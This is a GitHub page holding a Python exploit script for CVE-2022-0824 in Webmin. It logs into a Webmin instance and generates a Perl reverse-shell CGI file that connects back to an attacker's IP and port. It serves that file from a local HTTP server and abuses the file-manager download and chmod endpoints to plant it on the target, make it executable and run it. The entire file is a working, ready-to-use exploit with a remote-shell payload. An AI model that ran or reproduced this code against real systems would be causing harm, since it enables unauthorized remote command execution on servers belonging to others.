-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcve-2022-0824.py
86 lines (68 loc) · 3.64 KB
/
cve-2022-0824.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import os
import time
def generate_file(filename, ip, port):
file = open(f"{filename}.cgi",'w')
file.write('''perl -e 'use Socket;$i="''' +ip + '''";$p='''+port+r""";socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""")
print("Generated Payload")
def login(sess, user, passwd, host):
url = host + "/session_login.cgi"
cookies = {"redirect": "1", "testing": "1", "PHPSESSID": ""}
body = {"user" : user, "pass" : passwd}
sess.post(url, cookies=cookies, data=body, verify=False, allow_redirects=True, timeout=30)
print("Successfully logged in")
def local_fileserv(port):
os.system("python3 -m http.server "+port+ "&")
print("Python HttpServer Running")
def download_to_target(sess, host, local_filehost, filepath):
header1 = {
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"Referer": host + "/filemin/?xnavigation=1"
}
body1 = {
'link': "http://" + local_filehost + filepath ,
'username': '',
'password': '',
'path': "/usr/share/webmin"
}
url = host + "/extensions/file-manager/http_download.cgi?module=filemin"
sess.post(url, data=body1, headers=header1, verify=False, allow_redirects=True)
print("Payload Downloaded to remote host")
def modify_perm(sess, host):
header1 = {
"Accept": "application/json",
"Referer": host + "/filemin/?xnavigation=1"
}
body = "name=shell.cgi&perms=0755&applyto=1&path=%2fusr%2fshare%2fwebmin"
url = host +"/extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30"
sess.post(url, data=body, headers=header1, verify=False, allow_redirects=True)
print("Permission modified to execute")
def run(host, user, passwd, file_serv_ip, file_serv_port, revshell_ip, revshell_port, proxy ):
generate_file("shell", revshell_ip, revshell_port)
websession=requests.Session()
websession.proxies={'http':proxy}
login(websession, user, passwd, host)
local_fileserv(file_serv_port)
time.sleep(3)
download_to_target(websession, host, f"{file_serv_ip}:{file_serv_port}", "shell.cgi")
print("Waiting for the file to download into the remote server")
modify_perm(websession, host)
res=websession.get(f"{host}/shell.cgi", verify=False, allow_redirects=True)
print(f"Status Code : {res.status_code}")
os.system(f"kill -9 $(lsof -t -i:{file_serv_port})")
print("Killing Python http.server")
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--host", required=True, help="Host url(complete)", type=str)
parser.add_argument("--user", required=True, help="Username", type=str)
parser.add_argument("--password", required=True, help="Password", type=str)
parser.add_argument("--Python_server",required=True, help="Python httpServer with port", type=str)
parser.add_argument("--callback_url",required=True, help="Callback ip and port", type=str)
parser.add_argument("--proxy", help="Proxy details", default="", type=str)
args=parser.parse_args()
run(args.host, args.user, args.password, args.Python_server.split(":")[0], args.Python_server.split(":")[1], args.callback_url.split(":")[0], args.callback_url.split(":")[1], args.proxy)